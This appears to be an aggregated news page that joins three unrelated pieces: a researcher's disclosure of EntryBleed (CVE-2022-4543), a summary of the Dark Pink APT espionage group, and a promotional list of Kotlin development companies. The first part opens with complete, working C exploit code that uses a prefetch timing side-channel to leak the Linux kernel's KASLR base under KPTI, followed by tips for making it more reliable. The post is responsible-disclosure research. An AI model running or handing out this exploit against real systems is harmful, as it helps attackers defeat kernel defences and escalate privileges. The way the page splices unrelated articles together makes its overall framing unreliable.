#include <stdio.h> #include <stdlib.h> #include <stdint.h> #define KERNEL\_LOWER\_BOUND 0xffffffff80000000ull #define KERNEL\_UPPER\_BOUND 0xffffffffc0000000ull #define entry\_SYSCALL\_64\_offset 0x400000ull uint64\_t sidechannel(uint64\_t addr) { uint64\_t a, b, c, d; asm volatile (".intel\_syntax noprefix;" "mfence;" "rdtscp;" "mov %0, rax;" "mov %1, rdx;" "xor rax, rax;" "lfence;" "prefetchnta qword ptr \[%4\];" "prefetcht2 qword ptr \[%4\];" "xor rax, rax;" "lfence;" "rdtscp;" "mov %2, rax;" "mov %3, rdx;" "mfence;" ".att\_syntax;" : "=r" (a), "=r" (b), "=r" (c), "=r" (d) : "r" (addr) : "rax", "rbx", "rcx", "rdx"); a = (b << 32) | a; c = (d << 32) | c; return c - a; } #define STEP 0x100000ull #define SCAN\_START KERNEL\_LOWER\_BOUND + entry\_SYSCALL\_64\_offset #define SCAN\_END KERNEL\_UPPER\_BOUND + entry\_SYSCALL\_64\_offset #define DUMMY\_ITERATIONS 5 #define ITERATIONS 100 #define ARR\_SIZE (SCAN\_END - SCAN\_START) / STEP uint64\_t leak\_syscall\_entry(void) { uint64\_t data\[ARR\_SIZE\] = {0}; uint64\_t min = ~0, addr = ~0; for (int i = 0; i < ITERATIONS + DUMMY\_ITERATIONS; i++) { for (uint64\_t idx = 0; idx < ARR\_SIZE; idx++) { uint64\_t test = SCAN\_START + idx \* STEP; syscall(104); uint64\_t time = sidechannel(test); if (i >= DUMMY\_ITERATIONS) data\[idx\] += time; } } for (int i = 0; i < ARR\_SIZE; i++) { data\[i\] /= ITERATIONS; if (data\[i\] < min) { min = data\[i\]; addr = SCAN\_START + i \* STEP; } printf("%llx %ld\\n", (SCAN\_START + i \* STEP), data\[i\]); } return addr; } int main() { printf ("KASLR base %llx\\n", leak\_syscall\_entry() - entry\_SYSCALL\_64\_offset); }

KASLR bypassed on systems with KPTI in less than 100 lines of C!

I’ve managed to have this work on multiple Intel CPUs (including i5-8265U, i7-8750H,  i7-9700F, i7-9750H, Xeon(R) CPU E5-2640) - I got it working on some VPS instances too but was unable to figure out the Intel CPU model there. It seems to work across a wide range of kernel versions with KPTI - I’ve tested it on Arch 6.0.12-hardened1-1-hardened, Ubuntu 5.15.0-56-generic, 6.0.12-1-MANJARO, 5.10.0-19-amd64, and a custom 5.18.3 build. It also works in KVM guests to leak the guest OS KASLR base (one would need to forward the host CPU features with "-cpu host" in QEMU for prefetch to even work though). I'm not sure how the TLB side-effects are preserved in a VM scenario though across CR3 writes and potential VM exits - if anyone has ideas, please let me know! As of now, I don’t think this attack affects AMD, but I also don't have direct access to any AMD hardware (see edit in the end). Lastly, I don't believe the repeated syscalls are necessary in my exploit as later tests show that it worked without making them with each measurement most likely due to the global bit, but I still kept it in my exploit just to guarantee its existence in the TLB.

Here is a demonstration of it (kernel base is printed before the shell for comparison purposes): 

One thing that could be done for increasing reliability would be accessing a lot of userspace addresses beforehand at specific strides to evict the TLB (and avoid false answers from other cached kernel addresses, which I saw with higher frequency on some systems). I also hypothesize that in scenarios without KPTI (like in ProjectZero’s case), prefetch would work even better if one were to trigger a specific codepath in kernel and specifically hunt for that offset during the side-channel.

In conclusion, Linux KPTI doesn’t do it’s job and it’s still quite easy to get KASLR base. I’ve already emailed security@kernel.org as well as relevant mailing lists for distros, and was authorized to disclose this as a potential fix might take a while. I’m honestly not too sure what the best approach to fix this as it’s more of an implementation issue, but I suggested that to randomize the virtual address of entry/exit handlers that are mapped into userspace, have them be at a fixed virtual address unrelated to kernel base, or have a randomized offset from kernel base. I suspect that this problem might really just be due to a major oversight; one kernel developer mentioned to me that this was definitely not the intent and might have been a regression.

I’ll end this post with some acknowledgements. A huge shoutout must go to my uarch security mentor Joseph Ravichandran from MIT CSAIL for guiding me throughout this field of research and advising me a lot on this bug. He introduced me to prefetch attacks through the Secure Hardware Design course from Professor Mengjia Yan - one of their final labs is actually about bypassing userland ASLR using prefetch. Thanks must go to Seth Jenkins at ProjectZero for the original inspiration too, and D3v17 for his support and extensive testing. As always, feel free to ask questions or point out any mistakes in my explanations!

Edit (12/18/2022): As bcoles later informed me, a generic prefetch attack seems to work for some AMD CPUs, which isn't surprising given this paper and this security advisory. However, it's also important to note that this would basically be the same attack as ProjectZero discussed originally, as AMD was not affected by Meltdown so KPTI was never enabled for their processors.

CVE-2022-4543: EntryBleed: Breaking KASLR under KPTI with Prefetch (CVE-2022-4543)

By Habiba Rashid
The Dark Pink APT group has been targeting countries in the APAC region.
This is a post from HackRead.com Read the original post: Espionage Meets Color: Dark Pink APT Group Revealed

So far, the cybersecurity researchers at Group-IB have uncovered seven confirmed attacks carried out by the Dark Pink hackers.

Group-IB’s recent blog warns of a relatively new advanced persistent threat (APT) group which brings more dangerous espionage techniques and procedures to the table than seen before.

Labelled ‘Dark Pink’ by Group-IB’s analysts; this APT group is behind a new wave of attacks that have struck the Asia-Pacific (APAC) region. 

This APT group has also been termed Saaiwc Group by Chinese cybersecurity researchers. Dark Pink’s operations can be dated as far back as mid-2021 according to Group-IB’s researchers who identified activity on its GitHub account. However, the group’s activity surged in the period from mid to late 2022. 

In their detailed report, Group-IB states that their sector-leading Threat Intelligence uncovered seven confirmed attacks by Dark Pink. The majority of these attacks were in the APAC region with just one carried out against a European governmental ministry. 

“The confirmed victims include two military bodies in the Philippines and Malaysia, government agencies in Cambodia, Indonesia and Bosnia and Herzegovina, and a religious organization in Vietnam. Group-IB also became aware of an unsuccessful attack on a European state development agency based in Vietnam,” the blog post states.

Timeline and targets of Dark Pink APT group (Image: Group-IB)

What makes Dark Pink’s attacks so effective is their use of a new set of tactics, techniques, and procedures rarely ever seen before amongst APT groups. Their custom toolkit consists of TelePowerBot, KamiKakaBot, and Cucky and Ctealer information stealers (all names given by Group-IB). They are also able to infect USB devices attached to compromised computers and gain access to messengers on infected machines.

One of Dark Pink’s spear-phishing emails used to gain initial access was found by Group-IB. In this particular instance, the threat actor posed as a job applicant applying for the PR and Communications intern position.

In the email, the threat actor mentions that they found the vacancy on a jobseeker site, which could suggest that the threat actors scan job boards and use this information to create highly relevant phishing emails. This only goes to show how carefully these phishing emails are curated for them to become so threatening. 

In the aforementioned attack, the email contained a shortened URL linking to a free-to-use file-sharing site where the victim can choose to download an ISO image. This contains all the files needed for the threat actors to infect the victim’s network.

In this situation, the victim is likely to look for the supposed applicant’s resume, often sent as an MS Word document, but the threat actor included a .exe file that mimicked an MS Word file. By using the MS Word icon and writing “.doc” in the file name, the threat actors tried to confuse the victim into believing the file was safe to open.

Kill Chain of the Dark Pink APT group (Image: Group-IB)

Group-IB details all their findings regarding Dark Pink’s kill chains, initial access, reconnaissance and lateral movement, data exfiltration, evasion techniques, and tools. They hope that this preliminary research will allow cybersecurity experts to raise awareness of the new TTPs utilized by Dark Pink and will aid organizations in taking relevant steps to protect themselves from potentially devastating APT attacks. 

Along with shedding light on the detrimental effects of APT groups leveraging new TTPs, it is our aim to highlight a set of precautions that can be taken by organizations in order to protect themselves from targeted and highly decisive attacks. 

Here are some steps that organizations can take to cultivate a securer workplace culture:

*   Employ modern email protection measures that are highly effective in thwarting hacking campaigns right at the first step by preventing initial compromise via spear-phishing emails. 
*   Train your personnel to identify phishing emails and educate them on the damage they can cause.
*   Ensure that your security measures allow for proactive threat hunting that can help identify threats that cannot be detected automatically.
*   Limit access to file-sharing resources, with the exception of those used within the organization.
*   Monitor the creation of LNK files in unusual locations, such as network drives and USB devices.
*   Ensure that you observe any use of commands and built-in tools that are frequently used for collecting information about the system and files.

1.  NK APT37 Unleashes Dolphin Backdoor on SK
2.  APT Groups Trapping Targets with Clever Twitter Scheme
3.  Malicious Office docs make up 43% of all malware downloads
4.  Windows, Linux and macOS Users Hit by Chinese Iron Tiger Group
5.  Indian APT exposes Modus Operandi by infecting their own devices

I’m a student and cybersecurity writer. On a random Sunday, I am likely to be figuring out life and reading Kafka.

Espionage Meets Color: Dark Pink APT Group Revealed

By Owais Sultan
Find out what Kotlin app development will bring to your company, which global giants have already taken advantage…
This is a post from HackRead.com Read the original post: Kotlin app development company – How to choose

Find out what Kotlin app development will bring to your company, which global giants have already taken advantage of it, and how to choose a reliable Kotlin app development company.

**How to Choose Kotlin App Development Company?**

Choosing the right tech stack is the key to ensuring your digital solution keeps up with the times, i.e., meets current trends and satisfies consumer needs. By “right,” we mean advanced tools that allow you to create high-performance, functional and easily scalable software.

Kotlin can be safely attributed to the list of such programming languages and the companies that work with it to the promising suppliers of software products in today’s market. 

Today we’ll talk about why Kotlin is so in demand with developers and their clients and discuss why it’s so important to choose a reliable Kotlin app development company.

**All You Need To Know About Kotlin**

Kotlin is an object-oriented programming language with static typing that was created more than 10 years ago and was originally considered an alternative to Java. However, its creators have made it so compact, convenient, and versatile that it has surpassed in popularity both Java and other equally popular languages, like JavaScript, Ruby, and C++. 

In addition to its popularity among programmers, Kotlin is trusted by the world’s IT industry flagships. Jira, Adobe, Reddit, Twitter, Netflix, and many others have adopted it. Most of the most popular programs on the Play Market are written in it, and Google even declared it the preferred language for Android development. 

Note the reasons why you should find a reliable Kotlin app development company now:

1.  **The demand for this language among successful companies.** According to statistics, many well-known corporations plan to migrate their digital solutions to Kotlin by the end of 2022. Uber and Pinterest are among those that have already done so.
2.  **Compliance with modern software requirements.** Kotlin allows you to write 40% less code than Java. This helps teams achieve one of their main goals: get the finished product to market faster. Other benefits include writing error-free code and creating easily scalable digital products. It is also handy for Data Science, including creating machine learning models.
3.  **Versatility of language.** Kotlin’s creators claim that “Kotlin is a language for all platforms.” That is, it can be used to write digital solutions for mobile and smart devices (e.g., Android, iOS, WatchOS) and desktop apps for macOS, Windows, Linux, etc. You can also order the development of a cross-platform product. This is possible thanks to Multiplatform technology, the benefits of which have already been used by many global giants, including Netflix, Baidu, and PlanGrid.

Enough arguments in favour of Kotlin software development, right? Let’s discuss what to look for when choosing a company that specializes in creating Kotlin apps.

**Kotlin Developer Selection Criteria **

When choosing a Kotlin app development company, pay attention to the reputation of the provider itself, as well as the performance of the individual developers it works with. Below are three parameters by which we recommend evaluating the professionalism of Kotlin developers:

**1: Hands-on experience.** The skills of the developer who will be involved in your project should not be limited to theory. A good specialist must have practical experience in writing different types of apps in this and other languages, as well as a good understanding of object-oriented programming, web service concepts, and mobile solution architecture. 

**2: Tech stack.** According to statistics, 92% of developers wrote code in Java before switching to Kotlin. Of these, 86% continue to program in Java in parallel with Kotlin, and among other tools that are popular with these programmers are JavaScript, SQL, and HTML/CSS. Consequently, knowledge of this technology stack will be one of the first hard skills to test when selecting a candidate. 

Another important point is a thorough understanding of XML markup language, as it is necessary for the layout of a mobile and web solution. We should also not forget about Android tools because the priority area of using Kotlin is still mobile development.

**3: Personality traits.** No matter how first-rate a developer is, they will not benefit your company if they do not know how to work in a team and do not possess other important soft skills. When choosing a programmer, look for these qualities: 

*   research skills;
*   ability to adapt;
*   ability to manage time;
*   the desire for self-development;
*   ability to defend their own position.

To avoid making a mistake with a Kotlin-development service provider, turn only to proven companies with extensive market experience, a positive reputation, and an impressive portfolio with successful cases.

**Top 5 Kotlin App Development Companies**

Are you looking for the best developers to implement your project? Here is a list of time-tested Kotlin app development companies.

**\-> Brights**

Brights is a company that has been developing digital solutions for clients worldwide for 11 years. Their agile team of 100 people specializes in creating fintech startups and developing enterprise software. They are not afraid of the responsibility of implementing bold solutions and provide a full range of services, from hypothesis testing to testing, release, and subsequent optimization of a full-fledged digital product.

Services provided:

*   Web Development.
*   Mobile solution creation.
*   UI/UX design.
*   QA testing.
*   Machine Learning.
*   DevOps security.

Distinguishing features:

*   comprehensive software development services;
*   creation of digital solutions within the agreed time and budget;
*   the use of advanced technologies and tools;
*   high-quality communication with the customer.

**\-> Concetto Labs**

Working for seven years on the market, Concetto Labs Agile team has managed to implement more than 500 successful projects. The specialists of this company specialize in Microsoft development services. They develop mobile and web software for businesses of all sizes, from small startups to large corporations.

Services provided:

*   Powerapps Development.
*   Power BI Development.
*   Power Automate Development.
*   ASP.NET Core Development.
*   Microsoft Office 365 Add-ins Development.
*   Azure Data Factory.

Distinguishing features:

*   24/7 user support;
*   competitive prices and speed of delivery;
*   flexible interaction models.

**\-> Hidden Brains **

Hidden Brains is one of the leading Kotlin software development companies. Its specialists create functional apps for Android that are distinguished by high performance. The company has worked successfully with clients from over 100 countries for 19 years.

Services provided:

*   Development of web programs.
*   Creation of apps for mobile devices.
*   Frontend development.
*   Microsoft development.
*   Digital solution prototyping.
*   Cloud technology and DevOps.

Distinguishing features:

*   broad industry expertise;
*   dedicated team of Kotlin developers;
*   experience with ML, IoT, and AI technologies;
*   experience in creating chatbots.

**\-> Techahead******

The company has been creating customer-centric and easily scalable solutions for mobile and web platforms since 2009. The Techahead team has experience working with leaders in various industries, including finance, real estate, e-commerce, insurance, and many others. 

Services provided:

*   Mobile and web development.
*   Modernization and maintenance of digital solutions.
*   Cloud engineering and IoT.
*   research and consulting.
*   UX/UI design.
*   DevOps.
*   QA and testing.
*   User analytics.
*   Digital marketing.

Distinguishing features:

*   experience working with Fortune 500 brands;
*   turnkey design and development;
*   quick adaptation to the code of the existing project when upgrading it;
*   attention to detail.

**\-> Mobiloitte******

Mobiloitte positions itself as a Blockchain and Metaverse Company that is as focused as possible on its digital products’ security, scalability, and performance. For 18 years, the company has accumulated over 4,500 successfully completed projects in its portfolio, and millions of satisfied consumers use its software products.

Services provided:

*   IoT.
*   Blockchain development.
*   Backend technologies.
*   Creation of digital products for mobile devices.
*   Artificial Intelligence and Machine Learning.
*   Audit of smart contracts.

Distinguishing features:

*   strict adherence to deadlines;
*   use of trendy technologies;
*   high quality of work and 100% customer satisfaction.

**Summarizing**

Hiring a dedicated team of Kotlin developers is a great alternative to hiring in-house specialists. It will save your budget without sacrificing the quality of the finished product or the speed of its release. Turn to a trusted software development service provider and follow global trends in digital transformation.

1.  Top 10 Things to do During Development
2.  How to Choose Tech Stack for Mobile App Development
3.  Benefits of CI/CD for Your Software Development Company
4.  How to Choose the Right Web Development Firm for Startup?
5.  Development of Corporate Apps Based on Artificial Intelligence

Tag

#linux